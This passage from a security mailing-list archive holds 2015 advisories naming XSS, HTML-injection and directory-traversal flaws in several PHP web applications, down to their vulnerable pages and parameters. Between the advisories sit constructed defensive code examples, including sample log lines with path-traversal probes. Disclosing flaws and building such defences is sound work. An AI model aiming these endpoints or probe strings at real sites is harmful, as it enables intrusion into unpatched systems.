offer custom design and development services tailored to your needs and
specifications drawn up jointly with you to ensure that the appropriate
technology is leveraged for optimum results, creating a dynamic and
effective design, based on market effectiveness and user-friendly design
standards. Our developers are experts in web application development using
various programming languages including Perl, SQL, C, C+, and many other
back-end programming languages, as well as database integration. For a view
of some of your past projects, take a look at our list of clients. We
handle custom development of your Internet project from conception through
publication:

Internet & Intranet sites
Design concepts, layouts, and specifications
Intuitive Graphical User Interface (GUI) design
Dynamic navigation design
Creation and manipulation of graphical design elements
GIF Animation
Flash development
HTML hand-coding and debugging
JavaScript for interactivity and error-checking
ASP (Active Server Pages)
Customized Perl CGI scripts (mailing lists, form submission, etc)
Customized application development in varied programming languages
Site publication and promotion
On-going updating and maintenance
Banner ads"




*(2) Vulnerability Details:*
MT.VERNON MEDIA Web-Design web application has a computer security bug
problem. It can be exploited by stored XSS attacks. This may allow a remote
attacker to create a specially crafted request that would execute arbitrary
script code in a user's browser session within the trust relationship
between their browser and the server.

Several other MT.VERNON MEDIA products' 0-day vulnerabilities have been
found by some other bug hunter researchers before. MT.VERNON MEDIA has
patched some of them. BugScan is the first community-based scanner and has
experienced five code refactorings. It has redefined the concept of the
scanner and provides sources for the latest info-sec news, tools, and
advisories. It also publishes suggestions, advisories and solution details
related to XSS vulnerabilities.


*(2.1)* The first programming code flaw occurs at the "section.php?" page
with the "&id" parameter.

*(2.2)* The second programming code flaw occurs at the
"illustrated_verse.php?" page with the "&id" parameter.

*(2.3)* The third programming code flaw occurs at the "image.php?" page
with the "&id" parameter.

*(2.4)* The fourth programming code flaw occurs at the "gallery.php?" page
with the "&np" parameter.







*References:*
http://www.tetraph.com/security/xss-vulnerability/mt-vernon-media-web-design-v1-12-multiple-xss/
http://securityrelated.blogspot.com/2015/05/mtvernon-media-web-design-v112-multiple.html
http://www.inzeed.com/kaleidoscope/computer-web-security/mt-vernon-media-web-design-v1-12-multiple-xss/
https://vulnerabilitypost.wordpress.com/2015/05/08/mt-vernon-media-web-design-v1-12-multiple-xss/
http://whitehatpost.blog.163.com/blog/static/24223205420154885036469
https://progressive-comp.com/?a=139222176300014&r=1&w=1
https://www.fusionvm.com/FusionVM/DesktopModules/SecurityAdvisories/SecurityAdvisoriesView.aspx?Alias=www.fusionvm&TabId=0&Lang=en-US&OU=0&ItemId=44832
https://www.bugscan.net/#!/x/21289
http://bluereader.org/article/30765596






--
Jing Wang,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.co
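Added example, not the vendors' code, serving the XSS and HTML Injection advisories above (Gcon Tech Solutions content.php?id=, Feed2JS magpie_debug.php?url=, MT.VERNON MEDIA gallery.php?category= and ?np=): rendering a reflected request parameter back into a page by its output context, beside the unsafe pattern. The function names, page layout and sample values are assumptions constructed for illustration.

```php
<?php
// Added example, not the vendors' code: rendering request parameters such
// as content.php?id=, gallery.php?category=, gallery.php?np= and
// magpie_debug.php?url= back into a page without letting markup through.
// Function names, page layout and sample values are constructed assumptions.

declare(strict_types=1);

/** Unsafe pattern: the parameter is concatenated straight into the markup. */
function render_unsafe(string $category): string
{
    return '<h2>Gallery: ' . $category . '</h2>';
}

/** HTML text and quoted-attribute context: encode the significant characters. */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/**
 * href context: encoding alone does not make a reflected address safe,
 * because a non-http scheme is still a clickable link. Only absolute
 * http(s) URLs are accepted; anything else yields an empty attribute.
 */
function safe_href(string $url): string
{
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])
        || !in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return '';
    }
    return h($url);
}

/** Hardened rendering of three reflected values, each handled by context. */
function render_safe(string $category, string $feedUrl, string $np): string
{
    // Numeric page index: validate, then cast, so only digits reach the page.
    $page = ctype_digit($np) ? (int) $np : 1;
    return '<h2>Gallery: ' . h($category) . "</h2>\n"
         . '<p>Feed: <a href="' . safe_href($feedUrl) . '">' . h($feedUrl) . "</a></p>\n"
         . '<p>Page ' . $page . "</p>\n";
}

// Constructed inputs: markup inside a text value, "&" inside a URL,
// a non-http scheme, and a non-numeric page index.
$category = 'landscapes<b>"wide"</b>';
$feedUrls = ['https://feed.example/rss.xml?a=1&b=2', 'data:text/html,x'];
$np       = '3; x';

echo "unsafe:\n", render_unsafe($category), "\n\n";
foreach ($feedUrls as $u) {
    echo "hardened:\n", render_safe($category, $u, $np), "\n";
}
```

In the hardened output the tags in the category value appear as literal text (`&lt;b&gt;`), the ampersand in the feed URL is encoded, and the data: address is dropped from the href while still being shown as text.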

[FD] NetCat CMS 3.12 HTML Injection Security Vulnerabilities

2015-04-14 Thread Jing Wang
*NetCat CMS 3.12 HTML Injection Security Vulnerabilities*


Exploit Title: NetCat CMS 3.12 /catalog/search.php? q Parameter HTML
Injection Security Vulnerabilities
Product: NetCat CMS (Content Management System)
Vendor: NetCat
Vulnerable Versions: 3.12, 3.0, 2.4, 2.3, 2.2, 2.1, 2.0, 1.1
Tested Version: 3.12
Advisory Publication: April 15, 2015
Latest Update: April 15, 2015
Vulnerability Type: Improper Input Validation [CWE-20]
CVE Reference: *
CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]







*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:*
NetCat


*Product & Version:*
NetCat
3.12   3.0   2.4   2.3   2.2   2.1   2.0   1.1


*Vendor URL & Download:*
NetCat can be downloaded from here,
http://netcat.ru/


*Product Introduction:*
NetCat.ru is a Russian local company. "NetCat designed to create an absolute
majority of the types of sites: from simple "business card" with a minimum
content to complex web-based systems, from corporate offices to online
stores, libraries or media data - in other words, projects completely
different directions and at any level of complexity. View examples of sites
running on NetCat CMS can be in a special section."

"Manage the site on the basis of NetCat can even inexperienced user,
because it does not require knowledge of Internet technologies, programming
and markup languages. NetCat constantly improving, adds new features. In
the process of finalizing necessarily take into account the wishes of our
partners and clients, as well as trends in Internet development. More than
2,000 studios and private web developers have chosen for their projects is
NetCat, and in 2013 sites, successfully working on our CMS, created more
than 18,000."





*(2) Vulnerability Details:*
NetCat web application has a security bug problem. It can be exploited by
HTML Injection attacks. Hypertext Markup Language (HTML) injection, also
sometimes referred to as virtual defacement, is an attack on a user made
possible by an injection vulnerability in a web application. When an
application does not properly handle user supplied data, an attacker can
supply valid HTML, typically via a parameter value, and inject their own
content into the page. This attack is typically used in conjunction with
some form of social engineering, as the attack is exploiting a code-based
vulnerability and a user's trust.

Several 0-day vulnerabilities in NetCat products have been found by some
other bug hunter researchers before. NetCat has patched some of them. Web
Security Watch is an aggregator of security reports coming from various
sources. It aims to provide a single point of tracking for all publicly
disclosed security issues that matter. "Its unique tagging system enables
you to see a relevant set of tags associated with each security alert for a
quick overview of the affected products. What's more, you can now subscribe
to an RSS feed containing the specific tags that you are interested in -
you will then only receive alerts related to those tags." It has published
suggestions, advisories, solutions details related to HTML vulnerabilities.

*(2.1)* The vulnerability occurs at "catalog/search.php?" page with "&q"
parameter.





*References:*
http://tetraph.com/security/html-injection/netcat-cms-3-12-html-injection/
http://securityrelated.blogspot.com/2015/04/netcat-cms-312-html-injection-security.html
http://www.inzeed.com/kaleidoscope/computer-web-security/netcat-cms-3-12-html-injection/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/netcat-cms-3-12-html-injection/
https://computerpitch.wordpress.com/2015/04/14/netcat-cms-3-12-html-injection-security-vulnerabilities/
http://www.irist.ir/author-Wang%20Jing.html
http://lists.openwall.net/full-disclosure/2015/03/02/5
http://www.websecuritywatch.com/multiple-http-response-splitting-crlf-xss-vulnerabilities-in-netcat-cms/
http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1676



--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
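The advisory above only names the "catalog/search.php?" endpoint and its "q" parameter. As an added illustration (not NetCat code and not part of the advisory), the block below puts the HTML-injection pattern next to its hardened form: a search term is reflected once inside a quoted attribute and once as element text, first raw and then HTML-encoded, with a small regression check a test suite can run against any reflected parameter. The two templates and the sample query strings are constructed stand-ins; the same encoding fix applies to the reflected-parameter XSS advisories elsewhere in this thread.

```python
"""Reflected search term: the HTML-injection pattern beside its hardened form.

Added example, not NetCat code. The page names only the endpoint
"catalog/search.php?" and its "q" parameter; the two page templates and the
sample query strings below are constructed stand-ins for what the CMS renders.
"""
import html
import urllib.parse

# Constructed sample query strings as a search page might receive them.
SAMPLE_QUERIES = [
    "q=netcat+cms",                 # ordinary term
    "q=%3Cb%3Ewelcome%3C%2Fb%3E",   # term carrying HTML tags
    "q=%22%3Eoops",                 # term that closes a quoted attribute
]


def parse_q(query_string: str) -> str:
    """Return the first 'q' value from a raw query string ('' if absent)."""
    params = urllib.parse.parse_qs(query_string, keep_blank_values=True)
    return params.get("q", [""])[0]


def render_unsafe(q: str) -> str:
    """The injection pattern: the raw term is concatenated straight into
    markup, once inside a quoted attribute and once as element text."""
    return f'<input name="q" value="{q}"><h2>Results for {q}</h2>'


def render_safe(q: str) -> str:
    """Hardened form: encode for HTML before insertion. html.escape with
    quote=True handles &, <, >, " and ', which covers both the element-text
    and the double-quoted-attribute contexts used here."""
    escaped = html.escape(q, quote=True)
    return f'<input name="q" value="{escaped}"><h2>Results for {escaped}</h2>'


def reflects_markup_unencoded(q: str, page: str) -> bool:
    """Regression check for a test suite: True when a term containing
    markup-significant characters appears in the page byte-for-byte."""
    has_markup_chars = any(ch in q for ch in '<>"\'&')
    return has_markup_chars and q in page


if __name__ == "__main__":
    for qs in SAMPLE_QUERIES:
        term = parse_q(qs)
        raw_unsafe = reflects_markup_unencoded(term, render_unsafe(term))
        raw_safe = reflects_markup_unencoded(term, render_safe(term))
        print(f"{qs!r:32} unsafe reflects raw: {raw_unsafe!s:5} safe reflects raw: {raw_safe}")
```

The check in reflects_markup_unencoded is deliberately strict about what counts as a finding: an ordinary term such as "netcat cms" appears verbatim in both renderings and is not a defect, so only terms carrying markup-significant characters are reported.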


[FD] NetCat CMS 3.12 Multiple Directory Traversal Security Vulnerabilities

2015-04-14 Thread Jing Wang
*NetCat CMS 3.12 Multiple Directory Traversal Security Vulnerabilities*


Exploit Title: NetCat CMS 3.12 Multiple Directory Traversal Security
Vulnerabilities
Product: NetCat CMS (Content Management System)
Vendor: NetCat
Vulnerable Versions: 3.12   3.0   2.4   2.3   2.2   2.1   2.0   1.1
Tested Version: 3.12
Advisory Publication: April 14, 2015
Latest Update: April 14, 2015
Vulnerability Type: Improper Limitation of a Pathname to a Restricted
Directory ('Path Traversal') [CWE-22]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P) (legend)
Impact Subscore: 6.4
Exploitability Subscore: 10.0
Discoverer and Reporter: Wang Jing [CCRG, Nanyang Technological University
(NTU), Singapore]






*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:*
NetCat


*Product & Vulnerable Version:*
NetCat
3.12   3.0   2.4   2.3   2.2   2.1   2.0   1.1


*Vendor URL & Download:*
NetCat can be obtained from here,
http://netcat.ru/


*Product Introduction Overview:*
NetCat.ru is a Russian local company. "NetCat designed to create an absolute
majority of the types of sites: from simple "business card" with a minimum
content to complex web-based systems, from corporate offices to online
stores, libraries or media data - in other words, projects completely
different directions and at any level of complexity. View examples of sites
running on NetCat CMS can be in a special section."

"Manage the site on the basis of NetCat can even inexperienced user,
because it does not require knowledge of Internet technologies, programming
and markup languages. NetCat constantly improving, adds new features. In
the process of finalizing necessarily take into account the wishes of our
partners and clients, as well as trends in Internet development. More than
2,000 studios and private web developers have chosen for their projects is
NetCat, and in 2013 sites, successfully working on our CMS, created more
than 18,000."




*(2) Vulnerability Details:*
NetCat web application has a security bug problem. It can be exploited by
Directory Traversal - Local File Include (LFI) attacks. A local file
inclusion (LFI) flaw is due to the script not properly sanitizing user
input, specifically path traversal style attacks (e.g. '../../') supplied
to the parameters. With a specially crafted request, a remote attacker can
include arbitrary files from the targeted host or from a remote host. This
may allow disclosing file contents or executing files like PHP scripts.
Such attacks are limited due to the script only calling files already on
the target host.

Several other 0-day vulnerabilities in NetCat products have been found by
some other bug hunter researchers before. NetCat has patched some of them. Gmane
(pronounced "mane") is an e-mail to news gateway. It allows users to access
electronic mailing lists as if they were Usenet newsgroups, and also
through a variety of web interfaces. Gmane is an archive; it never expires
messages (unless explicitly requested by users). Gmane also supports
importing list postings made prior to a list's inclusion on the service. It
has published suggestions, advisories, solutions related to Directory
Traversal vulnerabilities.



*(2.1)* The first programming code flaw occurs at "/netcat/index.php?" page
with "&INCLUDE_FOLDER" parameter.

*(2.2)* The second programming code flaw occurs at "/eshop/index.php?" page
with "&INCLUDE_FOLDER" parameter.

*(2.3)* The third programming code flaw occurs at "/add.php?" page with
"&INCLUDE_FOLDER" parameter.





References:
http://www.tetraph.com/security/directory-traversal-vulnerability/netcat-cms-3-12-multiple-directory-traversal-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/04/netcat-cms-312-multiple-directory.html
http://www.inzeed.com/kaleidoscope/computer-web-security/netcat-cms-3-12-multiple-directory-traversal-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/netcat-cms-3-12-multiple-directory-traversal-security-vulnerabilities/
https://computerpitch.wordpress.com/2015/04/14/netcat-cms-3-12-multiple-directory-traversal-security-vulnerabilities/
http://www.iedb.ir/author-Wang%20Jing.html
http://exploitarchive.com/724cms-5-01-4-59-4-01-3-01-directory-traversal/
http://lists.openwall.net/full-disclosure/2015/03/05/5
http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1666



--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
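The advisory above names the "INCLUDE_FOLDER" parameter on three scripts and describes the flaw as '../'-style traversal into a local include. As an added illustration (not NetCat code and not part of the advisory), the block below shows the defender's side: confining a user-supplied folder name to one base directory with two independent gates (a single-segment allow-list after full percent-decoding, then a canonical-path containment check), and reusing that same rule to flag requests in access logs that would have failed it. The base directory, the allow-list rule and the log lines are constructed for the example.

```python
"""Confining a user-supplied folder name to one base directory, plus a log
check for requests that would have failed that confinement.

Added example, not NetCat code. The page names only the "INCLUDE_FOLDER"
parameter on /netcat/index.php, /eshop/index.php and /add.php; the base
directory, the allow-list rule and the access-log lines below are
constructed for illustration.
"""
import os
import re
import urllib.parse

BASE_DIR = "/var/www/netcat/modules"        # constructed: includes may only come from here
SEGMENT_RE = re.compile(r"[A-Za-z0-9_-]+")   # one plain path segment, nothing else


class TraversalRejected(ValueError):
    """Raised when a folder value cannot be confined to BASE_DIR."""


def fully_decode(value: str, rounds: int = 3) -> str:
    """Undo percent-encoding until it stops changing, so that a double-encoded
    %252e%252e%252f is judged as the '../' it becomes, not as harmless text."""
    for _ in range(rounds):
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def resolve_include_folder(user_value: str, base_dir: str = BASE_DIR) -> str:
    """Return the absolute folder path for an acceptable value, else raise.

    Gate 1: the decoded value must be a single plain segment, which excludes
            '..', '/', '\\', NUL and every encoding of them.
    Gate 2: the canonicalised result must still lie under base_dir, so a
            future relaxation of gate 1 cannot silently reopen traversal.
    """
    value = fully_decode(user_value)
    if not SEGMENT_RE.fullmatch(value):
        raise TraversalRejected(f"folder name not a plain segment: {user_value!r}")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, value))
    if os.path.commonpath([base, candidate]) != base:
        raise TraversalRejected(f"resolves outside base: {candidate!r}")
    return candidate


# Constructed Apache-style access-log lines (RFC 5737 documentation addresses).
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [14/Apr/2015:10:01:02 +0000] "GET /netcat/index.php?INCLUDE_FOLDER=catalog HTTP/1.1" 200 5120',
    '203.0.113.7 - - [14/Apr/2015:10:01:09 +0000] "GET /netcat/index.php?INCLUDE_FOLDER=..%2F..%2Fconfig HTTP/1.1" 200 812',
    '198.51.100.2 - - [14/Apr/2015:10:02:11 +0000] "GET /eshop/index.php?INCLUDE_FOLDER=%252e%252e%252fconfig HTTP/1.1" 500 0',
    '198.51.100.9 - - [14/Apr/2015:10:03:40 +0000] "GET /add.php HTTP/1.1" 200 300',
]
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def traversal_probes(lines):
    """Return (ip, target) for every request whose INCLUDE_FOLDER value the
    confinement above would reject. Reusing the production rule keeps
    detection and enforcement from drifting apart."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urllib.parse.urlsplit(m["target"]).query
        for value in urllib.parse.parse_qs(query).get("INCLUDE_FOLDER", []):
            try:
                resolve_include_folder(value)
            except TraversalRejected:
                hits.append((m["ip"], m["target"]))
    return hits


if __name__ == "__main__":
    for ip, target in traversal_probes(SAMPLE_ACCESS_LOG):
        print(f"traversal attempt from {ip}: {target}")
```

Note that parse_qs already performs one round of percent-decoding, so the third log line reaches resolve_include_folder as "%2e%2e%2fconfig"; fully_decode is what turns it into "../config" and lets gate 1 reject it.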


[FD] Proverbs Web Calendar 2.1.2 XSS (Cross-site Scripting) Security Vulnerabilities

2015-04-05 Thread Jing Wang
*Proverbs Web Calendar 2.1.2 XSS (Cross-site Scripting) Security
Vulnerabilities*


Exploit Title: Proverbs Web Calendar /calendar.php Multiple Parameters XSS
(Cross-site Scripting) Security Vulnerabilities
Vendor: Proverbs
Product: Proverbs Web Calendar
Vulnerable Versions: 1.0.0   1.1   1.2.2   2.1   2.1.2
Tested Version: 1.2.2   2.1
Advisory Publication: April 03, 2015
Latest Update: April 03, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Writer and Reporter: Wang Jing [CCRG, Nanyang Technological University
(NTU), Singapore]







*Suggestion Details:*


*(1) Vendor & Product Description:*


*Vendor:*
Proverbs



*Product & Vulnerable Versions:*
Proverbs Web Calendar
1.0.0
1.1
1.2.2
2.1
2.1.2



*Vendor URL:*
http://www.proverbs.biz/



*Download:*
Proverbs Web Calendar can be obtained from here,
http://www.proverbsllc.com/demos/calendar/calendar.php
http://www.hotscripts.com/listing/proverbs-web-calendar/
http://www.c-point.com/free_php_scripts/calendar.php
http://www.html.it/articoli/proverbs-php-web-calendar-v-100-1/



*Product Introduction Overview:*
"This is a web event calendar developed using PHP and powered by MySQL. The
calendar is viewed in month format initially with a detailed view of daily
events as each calendar day is clicked on. The calendar is customizable
within a single file; allowing changes to the title, color choices,
calendar language, starting day of the week, time format(24hr/12hr), time
zone display and more"






*(2) Vulnerability Details:*
Proverbs Web Calendar web application has a security bug problem. It can be
exploited by XSS attacks. This may allow a remote attacker to create a
specially crafted request that would execute arbitrary script code in a
user's browser session within the trust relationship between their browser
and the server.

Several 0-day vulnerabilities in Proverbs Web Calendar products have been
found by some other bug hunter researchers before. Proverbs has patched
some of them. The milw00rm.com is an archive of exploits, videos, papers and
vulnerabilities. It has published suggestions, advisories, solutions
details related to Proverbs Web Calendar vulnerabilities.


*(2.1)* The first code programming flaw occurs at "/calendar.php" page with
"&day", "&month" and "&year" parameters.






*References:*
http://www.tetraph.com/security/xss-vulnerability/proverbs-web-calendar-2-1-2-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/04/proverbs-web-calendar-212-xss-cross.html
http://www.inzeed.com/kaleidoscope/computer-web-security/proverbs-web-calendar-2-1-2-xss-cross-site-scripting-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/proverbs-web-calendar-2-1-2-xss-cross-site-scripting-security-vulnerabilities/
https://hackertopic.wordpress.com/2015/04/02/proverbs-web-calendar-2-1-2-xss-cross-site-scripting-security-vulnerabilities/
http://static-173-79-223-25.washdc.fios.verizon.net/?l=full-disclosure&m=142576259903051&w=2
http://packetstormsecurity.com/files/130856/724CMS-5.01-4.59-4.01-3.01-Cross-Site-Scripting.html
https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01737.html
http://milw00rm.com/exploits/7076





--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] 6kbbs v8.0 XSS (Cross-site Scripting) Security Vulnerabilities

2015-04-05 Thread Jing Wang
*6kbbs v8.0 XSS (Cross-site Scripting) Security Vulnerabilities*


Exploit Title: 6kbbs XSS (Cross-site Scripting) Security Vulnerabilities
Vendor: 6kbbs
Product: 6kbbs
Vulnerable Versions: v7.1   v8.0
Tested Version: v7.1   v8.0
Advisory Publication: April 02, 2015
Latest Update: April 02, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Writer and Reporter: Wang Jing [CCRG, Nanyang Technological University
(NTU), Singapore]







*Suggestion Details:*


*(1) Vendor & Product Description:*


*Vendor:*
6kbbs



*Product & Vulnerable Versions:*
6kbbs
v7.1
v8.0



*Vendor URL & download:*
6kbbs can be obtained from here,
http://www.6kbbs.com/download.html
http://code.google.com/p/6kbbs/downloads/list



*Product Introduction Overview:*
"6kbbs V8.0 is a PHP + MySQL built using high-performance forum, has the
code simple, easy to use, powerful, fast and so on. It is an excellent
community forum program. The program is simple but not simple; fast, small;
Interface generous and good scalability; functional and practical pursuing
superior performance, good interface, the user's preferred utility
functions."

"1, using XHTML + CSS architecture, so that the structure of the page,
saving transmission static page code, but also easy to modify the
interface, more in line with WEB standards; 2, the Forum adopted Cookies,
Session, Application and other technical data cache on the forum, reducing
access to the database to improve the performance of the Forum. Can carry
more users simultaneously access; 3, the data points table function, reduce
the burden on the amount of data when accessing the database; 4, support
for multi-skin style switching function; 5, the use of RSS technology to
support subscriptions forum posts, recent posts, user's posts; 6, the
display frame mode + tablet mode, the user can choose according to their
own preferences to; 7. forum page optimization keyword search, so the forum
more easily indexed by search engines; 8, extension, for our friends to
provide a forum for a broad expansion of space services; 9, webmasters can
add different top and bottom of the ad, depending on the layout; 10, post
using HTML + UBB way the two editors, mutual conversion, compatible with
each other; ..."




*(2) Vulnerability Details:*
6kbbs web application has a security bug problem. It can be exploited by
XSS attacks. This may allow a remote attacker to create a specially crafted
request that would execute arbitrary script code in a user's browser
session within the trust relationship between their browser and the server.

Several 0-day vulnerabilities in 6kbbs products have been found by some other
bug hunter researchers before. 6kbbs has patched some of them. The
milw00rm.com is an archive of exploits, videos, papers and vulnerabilities. It
has published suggestions, advisories, solutions details related to 6kbbs
vulnerabilities.


*(2.1)* The first code programming flaw occurs at "/userlist.php?"
page with "&orderby" parameter.





*References:*
http://www.tetraph.com/security/xss-vulnerability/6kbbs-v8-0-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.sg/2015/04/6kbbs-v80-xss-cross-site-scripting.html?view=sidebar
http://www.inzeed.com/kaleidoscope/computer-web-security/6kbbs-v8-0-xss-cross-site-scripting-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/6kbbs-v8-0-xss-cross-site-scripting-security-vulnerabilities/
https://hackertopic.wordpress.com/2015/04/02/6kbbs-v8-0-xss-cross-site-scripting-security-vulnerabilities/
http://marc.info/?a=139222176300014&r=1&w=4
http://packetstormsecurity.com/files/authors/11717
https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01759.html
http://milw00rm.com/exploits/6673




--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
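The two advisories above (Proverbs Web Calendar, where "day", "month" and "year" are reflected from /calendar.php, and 6kbbs, where "orderby" is reflected from /userlist.php) both concern parameters that have an obvious declared shape: small integers and a sort key. As an added illustration (not Proverbs or 6kbbs code and not part of either advisory), the block below validates such parameters against their type before anything is rendered or queried: strict unsigned-integer parsing with a month-dependent day bound, and an allow-list lookup that maps the orderby token onto a column name so the raw token is never copied anywhere. The ranges, the sort-column table and the sample query strings are constructed.

```python
"""Type- and allow-list validation of query parameters before they reach a
template or a query.

Added example, not Proverbs or 6kbbs code. The page names only the parameters
(day, month, year on /calendar.php; orderby on /userlist.php); the ranges,
the sort-column table and the sample query strings are constructed.
"""
import calendar
import urllib.parse
from dataclasses import dataclass


class InvalidParameter(ValueError):
    """Raised for any value that is not exactly of the declared shape."""


# Constructed: URL token -> real column name. The token is the only thing a
# user can choose; the column name never comes from the request.
SORT_COLUMNS = {"username": "username", "posts": "post_count", "joined": "joined_at"}


def parse_int_param(params: dict, name: str, lo: int, hi: int) -> int:
    """Strict integer parsing: ASCII digits only (no sign, no spaces, no
    Unicode digits), then a closed range check. Reject, never coerce."""
    raw = params.get(name, [None])[0]
    if raw is None or not raw.isascii() or not raw.isdigit():
        raise InvalidParameter(f"{name}: expected an unsigned integer, got {raw!r}")
    value = int(raw)
    if not lo <= value <= hi:
        raise InvalidParameter(f"{name}: {value} outside {lo}..{hi}")
    return value


@dataclass(frozen=True)
class CalendarRequest:
    year: int
    month: int
    day: int


def parse_calendar_request(query_string: str) -> CalendarRequest:
    """Validate year, month and day together: the day bound depends on the
    month and year already accepted, so a 30 February never gets through."""
    params = urllib.parse.parse_qs(query_string, keep_blank_values=True)
    year = parse_int_param(params, "year", 1970, 2100)
    month = parse_int_param(params, "month", 1, 12)
    days_in_month = calendar.monthrange(year, month)[1]
    day = parse_int_param(params, "day", 1, days_in_month)
    return CalendarRequest(year, month, day)


def parse_orderby(query_string: str) -> str:
    """Map the orderby token onto a known column. Because the return value
    is looked up rather than copied, the raw token can never be spliced into
    an ORDER BY clause or echoed into the page."""
    params = urllib.parse.parse_qs(query_string, keep_blank_values=True)
    token = params.get("orderby", ["username"])[0]
    try:
        return SORT_COLUMNS[token]
    except KeyError:
        raise InvalidParameter(f"orderby: unknown sort key {token!r}") from None


def heading_for(req: CalendarRequest) -> str:
    """Validated integers can be echoed into markup without encoding because
    they cannot contain markup characters; the format spec fixes the shape."""
    return f"<h2>{req.year:04d}-{req.month:02d}-{req.day:02d}</h2>"


if __name__ == "__main__":
    samples = ["year=2015&month=4&day=3", "year=2015&month=2&day=30",
               "year=2015&month=4&day=3%3Cb%3E", "orderby=posts", "orderby=posts%20DESC"]
    for qs in samples:
        try:
            result = parse_orderby(qs) if qs.startswith("orderby") else parse_calendar_request(qs)
            print(f"{qs!r}: accepted -> {result}")
        except InvalidParameter as exc:
            print(f"{qs!r}: rejected ({exc})")
```

Rejecting rather than coercing matters here: int("3<b>") would have failed anyway, but int(" 3") or int("+3") would not, and a template that echoes the original string rather than the parsed integer would still reflect whatever was sent.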


[FD] 6kbbs v8.0 Multiple CSRF (Cross-Site Request Forgery) Security Vulnerabilities

2015-04-04 Thread Jing Wang
*6kbbs v8.0 Multiple CSRF (Cross-Site Request Forgery) Security
Vulnerabilities*


Exploit Title: 6kbbs Multiple CSRF (Cross-Site Request Forgery) Security
Vulnerabilities
Vendor: 6kbbs
Product: 6kbbs
Vulnerable Versions: v7.1   v8.0
Tested Version: v7.1   v8.0
Advisory Publication: April 02, 2015
Latest Update: April 02, 2015
Vulnerability Type: Cross-Site Request Forgery (CSRF) [CWE-352]
CVE Reference: *
CVSS Severity (version 2.0):
CVSS v2 Base Score: 6.8 (MEDIUM) (AV:N/AC:M/Au:N/C:P/I:P/A:P) (legend)
Impact Subscore: 6.4
Exploitability Subscore: 8.6
Writer and Reporter: Wang Jing [CCRG, Nanyang Technological University
(NTU), Singapore]







*Suggestion Details:*


*(1) Vendor & Product Description:*


*Vendor:*
6kbbs



*Product & Vulnerable Versions:*
6kbbs
v7.1
v8.0



*Vendor URL & download:*
6kbbs can be obtained from here,
http://www.6kbbs.com/download.html
http://en.sourceforge.jp/projects/sfnet_buzhang/downloads/6kbbs.zip/



*Product Introduction Overview:*
"6kbbs V8.0 is a PHP + MySQL built using high-performance forum, has the
code simple, easy to use, powerful, fast and so on. It is an excellent
community forum program. The program is simple but not simple; fast, small;
Interface generous and good scalability; functional and practical pursuing
superior performance, good interface, the user's preferred utility
functions."

"1, using XHTML + CSS architecture, so that the structure of the page,
